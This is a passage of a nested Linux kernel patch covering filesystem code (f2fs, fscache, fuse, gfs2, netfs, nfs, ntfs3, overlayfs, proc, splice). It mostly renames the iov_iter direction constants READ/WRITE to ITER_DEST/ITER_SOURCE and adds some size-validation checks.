+-	init_f2fs_rwsem(&sbi->cp_rwsem);
+-	init_f2fs_rwsem(&sbi->quota_sem);
+-	init_waitqueue_head(&sbi->cp_wait);
+ 	init_sb_info(sbi);
+ 
+ 	err = f2fs_init_iostat(sbi);
+@@ -4271,12 +4279,6 @@ try_onemore:
+ 	limit_reserve_root(sbi);
+ 	adjust_unusable_cap_perc(sbi);
+ 
+-	for (i = 0; i < NR_INODE_TYPE; i++) {
+-		INIT_LIST_HEAD(&sbi->inode_list[i]);
+-		spin_lock_init(&sbi->inode_lock[i]);
+-	}
+-	mutex_init(&sbi->flush_lock);
+-
+ 	f2fs_init_extent_cache_info(sbi);
+ 
+ 	f2fs_init_ino_entry_info(sbi);
+diff --git a/fs/fscache/io.c b/fs/fscache/io.c
+index 3af3b08a9bb3f..0d2b8dec8f82c 100644
+--- a/fs/fscache/io.c
++++ b/fs/fscache/io.c
+@@ -286,7 +286,7 @@ void __fscache_write_to_cache(struct fscache_cookie *cookie,
+ 	 * taken into account.
+ 	 */
+ 
+-	iov_iter_xarray(&iter, WRITE, &mapping->i_pages, start, len);
++	iov_iter_xarray(&iter, ITER_SOURCE, &mapping->i_pages, start, len);
+ 	fscache_write(cres, start, &iter, fscache_wreq_done, wreq);
+ 	return;
+ 
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index ab8ceddf9efad..903af9d85f8b9 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -141,13 +141,14 @@ static bool fscache_is_acquire_pending(struct fscache_volume *volume)
+ static void fscache_wait_on_volume_collision(struct fscache_volume *candidate,
+ 					     unsigned int collidee_debug_id)
+ {
+-	wait_var_event_timeout(&candidate->flags,
+-			       !fscache_is_acquire_pending(candidate), 20 * HZ);
++	wait_on_bit_timeout(&candidate->flags, FSCACHE_VOLUME_ACQUIRE_PENDING,
++			    TASK_UNINTERRUPTIBLE, 20 * HZ);
+ 	if (fscache_is_acquire_pending(candidate)) {
+ 		pr_notice("Potential volume collision new=%08x old=%08x",
+ 			  candidate->debug_id, collidee_debug_id);
+ 		fscache_stat(&fscache_n_volumes_collision);
+-		wait_var_event(&candidate->flags, !fscache_is_acquire_pending(candidate));
++		wait_on_bit(&candidate->flags, FSCACHE_VOLUME_ACQUIRE_PENDING,
++			    TASK_UNINTERRUPTIBLE);
+ 	}
+ }
+ 
+@@ -347,8 +348,8 @@ static void fscache_wake_pending_volume(struct fscache_volume *volume,
+ 	hlist_bl_for_each_entry(cursor, p, h, hash_link) {
+ 		if (fscache_volume_same(cursor, volume)) {
+ 			fscache_see_volume(cursor, fscache_volume_see_hash_wake);
+-			clear_bit(FSCACHE_VOLUME_ACQUIRE_PENDING, &cursor->flags);
+-			wake_up_bit(&cursor->flags, FSCACHE_VOLUME_ACQUIRE_PENDING);
++			clear_and_wake_up_bit(FSCACHE_VOLUME_ACQUIRE_PENDING,
++					      &cursor->flags);
+ 			return;
+ 		}
+ 	}
+diff --git a/fs/fuse/ioctl.c b/fs/fuse/ioctl.c
+index 61d8afcb10a3f..fcce94ace2c23 100644
+--- a/fs/fuse/ioctl.c
++++ b/fs/fuse/ioctl.c
+@@ -255,7 +255,7 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 		ap.args.in_pages = true;
+ 
+ 		err = -EFAULT;
+-		iov_iter_init(&ii, WRITE, in_iov, in_iovs, in_size);
++		iov_iter_init(&ii, ITER_SOURCE, in_iov, in_iovs, in_size);
+ 		for (i = 0; iov_iter_count(&ii) && !WARN_ON(i >= ap.num_pages); i++) {
+ 			c = copy_page_from_iter(ap.pages[i], 0, PAGE_SIZE, &ii);
+ 			if (c != PAGE_SIZE && iov_iter_count(&ii))
+@@ -324,7 +324,7 @@ long fuse_do_ioctl(struct file *file, unsigned int cmd, unsigned long arg,
+ 		goto out;
+ 
+ 	err = -EFAULT;
+-	iov_iter_init(&ii, READ, out_iov, out_iovs, transferred);
++	iov_iter_init(&ii, ITER_DEST, out_iov, out_iovs, transferred);
+ 	for (i = 0; iov_iter_count(&ii) && !WARN_ON(i >= ap.num_pages); i++) {
+ 		c = copy_page_to_iter(ap.pages[i], 0, PAGE_SIZE, &ii);
+ 		if (c != PAGE_SIZE && iov_iter_count(&ii))
+diff --git a/fs/gfs2/aops.c b/fs/gfs2/aops.c
+index 05bee80ac7dee..e782b4f1d1043 100644
+--- a/fs/gfs2/aops.c
++++ b/fs/gfs2/aops.c
+@@ -427,8 +427,6 @@ static int stuffed_readpage(struct gfs2_inode *ip, struct page *page)
+ 		return error;
+ 
+ 	kaddr = kmap_atomic(page);
+-	if (dsize > gfs2_max_stuffed_size(ip))
+-		dsize = gfs2_max_stuffed_size(ip);
+ 	memcpy(kaddr, dibh->b_data + sizeof(struct gfs2_dinode), dsize);
+ 	memset(kaddr + dsize, 0, PAGE_SIZE - dsize);
+ 	kunmap_atomic(kaddr);
+diff --git a/fs/gfs2/bmap.c b/fs/gfs2/bmap.c
+index 3bdb2c668a71c..e7537fd305dd2 100644
+--- a/fs/gfs2/bmap.c
++++ b/fs/gfs2/bmap.c
+@@ -61,9 +61,6 @@ static int gfs2_unstuffer_page(struct gfs2_inode *ip, struct buffer_head *dibh,
+ 		void *kaddr = kmap(page);
+ 		u64 dsize = i_size_read(inode);
+  
+-		if (dsize > gfs2_max_stuffed_size(ip))
+-			dsize = gfs2_max_stuffed_size(ip);
+-
+ 		memcpy(kaddr, dibh->b_data + sizeof(struct gfs2_dinode), dsize);
+ 		memset(kaddr + dsize, 0, PAGE_SIZE - dsize);
+ 		kunmap(page);
+diff --git a/fs/gfs2/glops.c b/fs/gfs2/glops.c
+index 49210a2e7ce75..d78b61ecc1cdf 100644
+--- a/fs/gfs2/glops.c
++++ b/fs/gfs2/glops.c
+@@ -397,38 +397,39 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	struct timespec64 atime;
+ 	u16 height, depth;
+ 	umode_t mode = be32_to_cpu(str->di_mode);
+-	bool is_new = ip->i_inode.i_state & I_NEW;
++	struct inode *inode = &ip->i_inode;
++	bool is_new = inode->i_state & I_NEW;
+ 
+ 	if (unlikely(ip->i_no_addr != be64_to_cpu(str->di_num.no_addr)))
+ 		goto corrupt;
+-	if (unlikely(!is_new && inode_wrong_type(&ip->i_inode, mode)))
++	if (unlikely(!is_new && inode_wrong_type(inode, mode)))
+ 		goto corrupt;
+ 	ip->i_no_formal_ino = be64_to_cpu(str->di_num.no_formal_ino);
+-	ip->i_inode.i_mode = mode;
++	inode->i_mode = mode;
+ 	if (is_new) {
+-		ip->i_inode.i_rdev = 0;
++		inode->i_rdev = 0;
+ 		switch (mode & S_IFMT) {
+ 		case S_IFBLK:
+ 		case S_IFCHR:
+-			ip->i_inode.i_rdev = MKDEV(be32_to_cpu(str->di_major),
+-						   be32_to_cpu(str->di_minor));
++			inode->i_rdev = MKDEV(be32_to_cpu(str->di_major),
++					      be32_to_cpu(str->di_minor));
+ 			break;
+ 		}
+ 	}
+ 
+-	i_uid_write(&ip->i_inode, be32_to_cpu(str->di_uid));
+-	i_gid_write(&ip->i_inode, be32_to_cpu(str->di_gid));
+-	set_nlink(&ip->i_inode, be32_to_cpu(str->di_nlink));
+-	i_size_write(&ip->i_inode, be64_to_cpu(str->di_size));
+-	gfs2_set_inode_blocks(&ip->i_inode, be64_to_cpu(str->di_blocks));
++	i_uid_write(inode, be32_to_cpu(str->di_uid));
++	i_gid_write(inode, be32_to_cpu(str->di_gid));
++	set_nlink(inode, be32_to_cpu(str->di_nlink));
++	i_size_write(inode, be64_to_cpu(str->di_size));
++	gfs2_set_inode_blocks(inode, be64_to_cpu(str->di_blocks));
+ 	atime.tv_sec = be64_to_cpu(str->di_atime);
+ 	atime.tv_nsec = be32_to_cpu(str->di_atime_nsec);
+-	if (timespec64_compare(&ip->i_inode.i_atime, &atime) < 0)
+-		ip->i_inode.i_atime = atime;
+-	ip->i_inode.i_mtime.tv_sec = be64_to_cpu(str->di_mtime);
+-	ip->i_inode.i_mtime.tv_nsec = be32_to_cpu(str->di_mtime_nsec);
+-	ip->i_inode.i_ctime.tv_sec = be64_to_cpu(str->di_ctime);
+-	ip->i_inode.i_ctime.tv_nsec = be32_to_cpu(str->di_ctime_nsec);
++	if (timespec64_compare(&inode->i_atime, &atime) < 0)
++		inode->i_atime = atime;
++	inode->i_mtime.tv_sec = be64_to_cpu(str->di_mtime);
++	inode->i_mtime.tv_nsec = be32_to_cpu(str->di_mtime_nsec);
++	inode->i_ctime.tv_sec = be64_to_cpu(str->di_ctime);
++	inode->i_ctime.tv_nsec = be32_to_cpu(str->di_ctime_nsec);
+ 
+ 	ip->i_goal = be64_to_cpu(str->di_goal_meta);
+ 	ip->i_generation = be64_to_cpu(str->di_generation);
+@@ -436,7 +437,7 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	ip->i_diskflags = be32_to_cpu(str->di_flags);
+ 	ip->i_eattr = be64_to_cpu(str->di_eattr);
+ 	/* i_diskflags and i_eattr must be set before gfs2_set_inode_flags() */
+-	gfs2_set_inode_flags(&ip->i_inode);
++	gfs2_set_inode_flags(inode);
+ 	height = be16_to_cpu(str->di_height);
+ 	if (unlikely(height > GFS2_MAX_META_HEIGHT))
+ 		goto corrupt;
+@@ -448,8 +449,11 @@ static int gfs2_dinode_in(struct gfs2_inode *ip, const void *buf)
+ 	ip->i_depth = (u8)depth;
+ 	ip->i_entries = be32_to_cpu(str->di_entries);
+ 
+-	if (S_ISREG(ip->i_inode.i_mode))
+-		gfs2_set_aops(&ip->i_inode);
++	if (gfs2_is_stuffed(ip) && inode->i_size > gfs2_max_stuffed_size(ip))
++		goto corrupt;
++
++	if (S_ISREG(inode->i_mode))
++		gfs2_set_aops(inode);
+ 
+ 	return 0;
+ corrupt:
+diff --git a/fs/gfs2/log.c b/fs/gfs2/log.c
+index 723639376ae2a..61323deb80bc7 100644
+--- a/fs/gfs2/log.c
++++ b/fs/gfs2/log.c
+@@ -80,6 +80,15 @@ void gfs2_remove_from_ail(struct gfs2_bufdata *bd)
+ 	brelse(bd->bd_bh);
+ }
+ 
++static int __gfs2_writepage(struct page *page, struct writeback_control *wbc,
++		       void *data)
++{
++	struct address_space *mapping = data;
++	int ret = mapping->a_ops->writepage(page, wbc);
++	mapping_set_error(mapping, ret);
++	return ret;
++}
++
+ /**
+  * gfs2_ail1_start_one - Start I/O on a transaction
+  * @sdp: The superblock
+@@ -131,7 +140,7 @@ __acquires(&sdp->sd_ail_lock)
+ 		if (!mapping)
+ 			continue;
+ 		spin_unlock(&sdp->sd_ail_lock);
+-		ret = filemap_fdatawrite_wbc(mapping, wbc);
++		ret = write_cache_pages(mapping, wbc, __gfs2_writepage, mapping);
+ 		if (need_resched()) {
+ 			blk_finish_plug(plug);
+ 			cond_resched();
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index b018957a1bb24..011f9e7660ef8 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -379,6 +379,7 @@ out:
+ 
+ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ {
++	const struct inode *inode = &ip->i_inode;
+ 	struct gfs2_dinode *str = buf;
+ 
+ 	str->di_header.mh_magic = cpu_to_be32(GFS2_MAGIC);
+@@ -386,15 +387,15 @@ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ 	str->di_header.mh_format = cpu_to_be32(GFS2_FORMAT_DI);
+ 	str->di_num.no_addr = cpu_to_be64(ip->i_no_addr);
+ 	str->di_num.no_formal_ino = cpu_to_be64(ip->i_no_formal_ino);
+-	str->di_mode = cpu_to_be32(ip->i_inode.i_mode);
+-	str->di_uid = cpu_to_be32(i_uid_read(&ip->i_inode));
+-	str->di_gid = cpu_to_be32(i_gid_read(&ip->i_inode));
+-	str->di_nlink = cpu_to_be32(ip->i_inode.i_nlink);
+-	str->di_size = cpu_to_be64(i_size_read(&ip->i_inode));
+-	str->di_blocks = cpu_to_be64(gfs2_get_inode_blocks(&ip->i_inode));
+-	str->di_atime = cpu_to_be64(ip->i_inode.i_atime.tv_sec);
+-	str->di_mtime = cpu_to_be64(ip->i_inode.i_mtime.tv_sec);
+-	str->di_ctime = cpu_to_be64(ip->i_inode.i_ctime.tv_sec);
++	str->di_mode = cpu_to_be32(inode->i_mode);
++	str->di_uid = cpu_to_be32(i_uid_read(inode));
++	str->di_gid = cpu_to_be32(i_gid_read(inode));
++	str->di_nlink = cpu_to_be32(inode->i_nlink);
++	str->di_size = cpu_to_be64(i_size_read(inode));
++	str->di_blocks = cpu_to_be64(gfs2_get_inode_blocks(inode));
++	str->di_atime = cpu_to_be64(inode->i_atime.tv_sec);
++	str->di_mtime = cpu_to_be64(inode->i_mtime.tv_sec);
++	str->di_ctime = cpu_to_be64(inode->i_ctime.tv_sec);
+ 
+ 	str->di_goal_meta = cpu_to_be64(ip->i_goal);
+ 	str->di_goal_data = cpu_to_be64(ip->i_goal);
+@@ -402,16 +403,16 @@ void gfs2_dinode_out(const struct gfs2_inode *ip, void *buf)
+ 
+ 	str->di_flags = cpu_to_be32(ip->i_diskflags);
+ 	str->di_height = cpu_to_be16(ip->i_height);
+-	str->di_payload_format = cpu_to_be32(S_ISDIR(ip->i_inode.i_mode) &&
++	str->di_payload_format = cpu_to_be32(S_ISDIR(inode->i_mode) &&
+ 					     !(ip->i_diskflags & GFS2_DIF_EXHASH) ?
+ 					     GFS2_FORMAT_DE : 0);
+ 	str->di_depth = cpu_to_be16(ip->i_depth);
+ 	str->di_entries = cpu_to_be32(ip->i_entries);
+ 
+ 	str->di_eattr = cpu_to_be64(ip->i_eattr);
+-	str->di_atime_nsec = cpu_to_be32(ip->i_inode.i_atime.tv_nsec);
+-	str->di_mtime_nsec = cpu_to_be32(ip->i_inode.i_mtime.tv_nsec);
+-	str->di_ctime_nsec = cpu_to_be32(ip->i_inode.i_ctime.tv_nsec);
++	str->di_atime_nsec = cpu_to_be32(inode->i_atime.tv_nsec);
++	str->di_mtime_nsec = cpu_to_be32(inode->i_mtime.tv_nsec);
++	str->di_ctime_nsec = cpu_to_be32(inode->i_ctime.tv_nsec);
+ }
+ 
+ /**
+diff --git a/fs/netfs/io.c b/fs/netfs/io.c
+index e374767d1b683..7f753380e047a 100644
+--- a/fs/netfs/io.c
++++ b/fs/netfs/io.c
+@@ -23,7 +23,7 @@ static void netfs_clear_unread(struct netfs_io_subrequest *subreq)
+ {
+ 	struct iov_iter iter;
+ 
+-	iov_iter_xarray(&iter, READ, &subreq->rreq->mapping->i_pages,
++	iov_iter_xarray(&iter, ITER_DEST, &subreq->rreq->mapping->i_pages,
+ 			subreq->start + subreq->transferred,
+ 			subreq->len   - subreq->transferred);
+ 	iov_iter_zero(iov_iter_count(&iter), &iter);
+@@ -49,7 +49,7 @@ static void netfs_read_from_cache(struct netfs_io_request *rreq,
+ 	struct iov_iter iter;
+ 
+ 	netfs_stat(&netfs_n_rh_read);
+-	iov_iter_xarray(&iter, READ, &rreq->mapping->i_pages,
++	iov_iter_xarray(&iter, ITER_DEST, &rreq->mapping->i_pages,
+ 			subreq->start + subreq->transferred,
+ 			subreq->len   - subreq->transferred);
+ 
+@@ -208,7 +208,7 @@ static void netfs_rreq_do_write_to_cache(struct netfs_io_request *rreq)
+ 			continue;
+ 		}
+ 
+-		iov_iter_xarray(&iter, WRITE, &rreq->mapping->i_pages,
++		iov_iter_xarray(&iter, ITER_SOURCE, &rreq->mapping->i_pages,
+ 				subreq->start, subreq->len);
+ 
+ 		atomic_inc(&rreq->nr_copy_ops);
+diff --git a/fs/nfs/fscache.c b/fs/nfs/fscache.c
+index e861d7bae305f..e731c00a9fcbc 100644
+--- a/fs/nfs/fscache.c
++++ b/fs/nfs/fscache.c
+@@ -252,7 +252,7 @@ static int fscache_fallback_read_page(struct inode *inode, struct page *page)
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, READ, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_DEST, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_read_operation(&cres, cookie);
+ 	if (ret < 0)
+@@ -282,7 +282,7 @@ static int fscache_fallback_write_page(struct inode *inode, struct page *page,
+ 	bvec[0].bv_page		= page;
+ 	bvec[0].bv_offset	= 0;
+ 	bvec[0].bv_len		= PAGE_SIZE;
+-	iov_iter_bvec(&iter, WRITE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
++	iov_iter_bvec(&iter, ITER_SOURCE, bvec, ARRAY_SIZE(bvec), PAGE_SIZE);
+ 
+ 	ret = fscache_begin_write_operation(&cres, cookie);
+ 	if (ret < 0)
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 2934ab1d9862b..0d49c6bb22eb1 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -943,7 +943,7 @@ __be32 nfsd_readv(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	ssize_t host_err;
+ 
+ 	trace_nfsd_read_vector(rqstp, fhp, offset, *count);
+-	iov_iter_kvec(&iter, READ, vec, vlen, *count);
++	iov_iter_kvec(&iter, ITER_DEST, vec, vlen, *count);
+ 	host_err = vfs_iter_read(file, &iter, &ppos, 0);
+ 	return nfsd_finish_read(rqstp, fhp, file, offset, count, eof, host_err);
+ }
+@@ -1033,7 +1033,7 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	if (stable && !use_wgather)
+ 		flags |= RWF_SYNC;
+ 
+-	iov_iter_kvec(&iter, WRITE, vec, vlen, *cnt);
++	iov_iter_kvec(&iter, ITER_SOURCE, vec, vlen, *cnt);
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index e352aa37330cd..22152300e60ca 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -132,6 +132,13 @@ next_attr:
+ 	if (le16_to_cpu(attr->name_off) + attr->name_len > asize)
+ 		goto out;
+ 
++	if (attr->non_res) {
++		t64 = le64_to_cpu(attr->nres.alloc_size);
++		if (le64_to_cpu(attr->nres.data_size) > t64 ||
++		    le64_to_cpu(attr->nres.valid_size) > t64)
++			goto out;
++	}
++
+ 	switch (attr->type) {
+ 	case ATTR_STD:
+ 		if (attr->non_res ||
+diff --git a/fs/ocfs2/cluster/tcp.c b/fs/ocfs2/cluster/tcp.c
+index f660c0dbdb63b..785cabd71d670 100644
+--- a/fs/ocfs2/cluster/tcp.c
++++ b/fs/ocfs2/cluster/tcp.c
+@@ -900,7 +900,7 @@ static int o2net_recv_tcp_msg(struct socket *sock, void *data, size_t len)
+ {
+ 	struct kvec vec = { .iov_len = len, .iov_base = data, };
+ 	struct msghdr msg = { .msg_flags = MSG_DONTWAIT, };
+-	iov_iter_kvec(&msg.msg_iter, READ, &vec, 1, len);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &vec, 1, len);
+ 	return sock_recvmsg(sock, &msg, MSG_DONTWAIT);
+ }
+ 
+diff --git a/fs/orangefs/inode.c b/fs/orangefs/inode.c
+index 7a8c0c6e698de..b3bbb5a5787ac 100644
+--- a/fs/orangefs/inode.c
++++ b/fs/orangefs/inode.c
+@@ -53,7 +53,7 @@ static int orangefs_writepage_locked(struct page *page,
+ 	bv.bv_len = wlen;
+ 	bv.bv_offset = off % PAGE_SIZE;
+ 	WARN_ON(wlen == 0);
+-	iov_iter_bvec(&iter, WRITE, &bv, 1, wlen);
++	iov_iter_bvec(&iter, ITER_SOURCE, &bv, 1, wlen);
+ 
+ 	ret = wait_for_direct_io(ORANGEFS_IO_WRITE, inode, &off, &iter, wlen,
+ 	    len, wr, NULL, NULL);
+@@ -112,7 +112,7 @@ static int orangefs_writepages_work(struct orangefs_writepages *ow,
+ 		else
+ 			ow->bv[i].bv_offset = 0;
+ 	}
+-	iov_iter_bvec(&iter, WRITE, ow->bv, ow->npages, ow->len);
++	iov_iter_bvec(&iter, ITER_SOURCE, ow->bv, ow->npages, ow->len);
+ 
+ 	WARN_ON(ow->off >= len);
+ 	if (ow->off + ow->len > len)
+@@ -270,7 +270,7 @@ static void orangefs_readahead(struct readahead_control *rac)
+ 	offset = readahead_pos(rac);
+ 	i_pages = &rac->mapping->i_pages;
+ 
+-	iov_iter_xarray(&iter, READ, i_pages, offset, readahead_length(rac));
++	iov_iter_xarray(&iter, ITER_DEST, i_pages, offset, readahead_length(rac));
+ 
+ 	/* read in the pages. */
+ 	if ((ret = wait_for_direct_io(ORANGEFS_IO_READ, inode,
+@@ -303,7 +303,7 @@ static int orangefs_read_folio(struct file *file, struct folio *folio)
+ 	bv.bv_page = &folio->page;
+ 	bv.bv_len = folio_size(folio);
+ 	bv.bv_offset = 0;
+-	iov_iter_bvec(&iter, READ, &bv, 1, folio_size(folio));
++	iov_iter_bvec(&iter, ITER_DEST, &bv, 1, folio_size(folio));
+ 
+ 	ret = wait_for_direct_io(ORANGEFS_IO_READ, inode, &off, &iter,
+ 			folio_size(folio), inode->i_size, NULL, NULL, file);
+diff --git a/fs/overlayfs/export.c b/fs/overlayfs/export.c
+index e065a5b9a442e..ac9c3ad04016e 100644
+--- a/fs/overlayfs/export.c
++++ b/fs/overlayfs/export.c
+@@ -796,7 +796,7 @@ static struct ovl_fh *ovl_fid_to_fh(struct fid *fid, int buflen, int fh_type)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	/* Copy unaligned inner fh into aligned buffer */
+-	memcpy(&fh->fb, fid, buflen - OVL_FH_WIRE_OFFSET);
++	memcpy(fh->buf, fid, buflen - OVL_FH_WIRE_OFFSET);
+ 	return fh;
+ }
+ 
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index eee8f08d32b63..e74a610a117ec 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -108,7 +108,7 @@ struct ovl_fh {
+ 	u8 padding[3];	/* make sure fb.fid is 32bit aligned */
+ 	union {
+ 		struct ovl_fb fb;
+-		u8 buf[0];
++		DECLARE_FLEX_ARRAY(u8, buf);
+ 	};
+ } __packed;
+ 
+diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
+index 8a74cdcc9af00..a954305fbc31b 100644
+--- a/fs/proc/task_mmu.c
++++ b/fs/proc/task_mmu.c
+@@ -737,9 +737,7 @@ static int smaps_hugetlb_range(pte_t *pte, unsigned long hmask,
+ 			page = pfn_swap_entry_to_page(swpent);
+ 	}
+ 	if (page) {
+-		int mapcount = page_mapcount(page);
+-
+-		if (mapcount >= 2)
++		if (page_mapcount(page) >= 2 || hugetlb_pmd_shared(pte))
+ 			mss->shared_hugetlb += huge_page_size(hstate_vma(vma));
+ 		else
+ 			mss->private_hugetlb += huge_page_size(hstate_vma(vma));
+diff --git a/fs/proc/vmcore.c b/fs/proc/vmcore.c
+index f2aa86c421f2d..5aa527ca6dbe8 100644
+--- a/fs/proc/vmcore.c
++++ b/fs/proc/vmcore.c
+@@ -199,7 +199,7 @@ ssize_t __weak elfcorehdr_read(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos, false);
+ }
+@@ -212,7 +212,7 @@ ssize_t __weak elfcorehdr_read_notes(char *buf, size_t count, u64 *ppos)
+ 	struct kvec kvec = { .iov_base = buf, .iov_len = count };
+ 	struct iov_iter iter;
+ 
+-	iov_iter_kvec(&iter, READ, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
+ 
+ 	return read_from_oldmem(&iter, count, ppos,
+ 			cc_platform_has(CC_ATTR_MEM_ENCRYPT));
+@@ -437,7 +437,7 @@ static vm_fault_t mmap_vmcore_fault(struct vm_fault *vmf)
+ 		offset = (loff_t) index << PAGE_SHIFT;
+ 		kvec.iov_base = page_address(page);
+ 		kvec.iov_len = PAGE_SIZE;
+-		iov_iter_kvec(&iter, READ, &kvec, 1, PAGE_SIZE);
++		iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, PAGE_SIZE);
+ 
+ 		rc = __read_vmcore(&iter, &offset);
+ 		if (rc < 0) {
+diff --git a/fs/read_write.c b/fs/read_write.c
+index 24b9668d63770..7a2ff6157eda4 100644
+--- a/fs/read_write.c
++++ b/fs/read_write.c
+@@ -384,7 +384,7 @@ static ssize_t new_sync_read(struct file *filp, char __user *buf, size_t len, lo
+ 
+ 	init_sync_kiocb(&kiocb, filp);
+ 	kiocb.ki_pos = (ppos ? *ppos : 0);
+-	iov_iter_ubuf(&iter, READ, buf, len);
++	iov_iter_ubuf(&iter, ITER_DEST, buf, len);
+ 
+ 	ret = call_read_iter(filp, &kiocb, &iter);
+ 	BUG_ON(ret == -EIOCBQUEUED);
+@@ -424,7 +424,7 @@ ssize_t __kernel_read(struct file *file, void *buf, size_t count, loff_t *pos)
+ 
+ 	init_sync_kiocb(&kiocb, file);
+ 	kiocb.ki_pos = pos ? *pos : 0;
+-	iov_iter_kvec(&iter, READ, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&iter, ITER_DEST, &iov, 1, iov.iov_len);
+ 	ret = file->f_op->read_iter(&kiocb, &iter);
+ 	if (ret > 0) {
+ 		if (pos)
+@@ -486,7 +486,7 @@ static ssize_t new_sync_write(struct file *filp, const char __user *buf, size_t
+ 
+ 	init_sync_kiocb(&kiocb, filp);
+ 	kiocb.ki_pos = (ppos ? *ppos : 0);
+-	iov_iter_ubuf(&iter, WRITE, (void __user *)buf, len);
++	iov_iter_ubuf(&iter, ITER_SOURCE, (void __user *)buf, len);
+ 
+ 	ret = call_write_iter(filp, &kiocb, &iter);
+ 	BUG_ON(ret == -EIOCBQUEUED);
+@@ -533,7 +533,7 @@ ssize_t __kernel_write(struct file *file, const void *buf, size_t count, loff_t
+ 		.iov_len	= min_t(size_t, count, MAX_RW_COUNT),
+ 	};
+ 	struct iov_iter iter;
+-	iov_iter_kvec(&iter, WRITE, &iov, 1, iov.iov_len);
++	iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, iov.iov_len);
+ 	return __kernel_write_iter(file, &iter, pos);
+ }
+ /*
+@@ -911,7 +911,7 @@ static ssize_t vfs_readv(struct file *file, const struct iovec __user *vec,
+ 	struct iov_iter iter;
+ 	ssize_t ret;
+ 
+-	ret = import_iovec(READ, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_DEST, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret >= 0) {
+ 		ret = do_iter_read(file, &iter, pos, flags);
+ 		kfree(iov);
+@@ -928,7 +928,7 @@ static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
+ 	struct iov_iter iter;
+ 	ssize_t ret;
+ 
+-	ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
++	ret = import_iovec(ITER_SOURCE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
+ 	if (ret >= 0) {
+ 		file_start_write(file);
+ 		ret = do_iter_write(file, &iter, pos, flags);
+diff --git a/fs/seq_file.c b/fs/seq_file.c
+index 9456a2032224a..f5fdaf3b15728 100644
+--- a/fs/seq_file.c
++++ b/fs/seq_file.c
+@@ -156,7 +156,7 @@ ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
+ 	ssize_t ret;
+ 
+ 	init_sync_kiocb(&kiocb, file);
+-	iov_iter_init(&iter, READ, &iov, 1, size);
++	iov_iter_init(&iter, ITER_DEST, &iov, 1, size);
+ 
+ 	kiocb.ki_pos = *ppos;
+ 	ret = seq_read_iter(&kiocb, &iter);
+diff --git a/fs/splice.c b/fs/splice.c
+index 0878b852b355c..5969b7a1d353a 100644
+--- a/fs/splice.c
++++ b/fs/splice.c
+@@ -303,7 +303,7 @@ ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
+ 	struct kiocb kiocb;
+ 	int ret;
+ 
+-	iov_iter_pipe(&to, READ, pipe, len);
++	iov_iter_pipe(&to, ITER_DEST, pipe, len);
+ 	init_sync_kiocb(&kiocb, in);
+ 	kiocb.ki_pos = *ppos;
+ 	ret = call_read_iter(in, &kiocb, &to);
+@@ -682,7 +682,7 @@ iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
+ 			n++;
+ 		}
+ 
+-		iov_iter_bvec(&from, WRITE, array, n, sd.total_len - left);
++		iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left);
+ 		ret = vfs_iter_write(out, &from, &sd.pos, 0);
+ 		if (ret <= 0)
+ 			break;
+@@ -1263,9 +1263,9 @@ static int vmsplice_type(struct fd f, int *type)
+ 	if (!f.file)
+ 		return -EBADF;
+ 	if (f.file->f_mode & FMODE_WRITE) {
+-		*type = WRITE;
++		*type = ITER_SOURCE;
+ 	} else if (f.file->f_mode & FMODE_READ) {
+-		*type = READ;
++		*type = ITER_DEST;
+ 	} else {
+ 		fdput(f);
+ 		return -EBADF;
+@@ -1314,7 +1314,7 @@ SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, uiov,
+ 
+ 	if (!iov_iter_count(&iter))
+ 		error = 0;
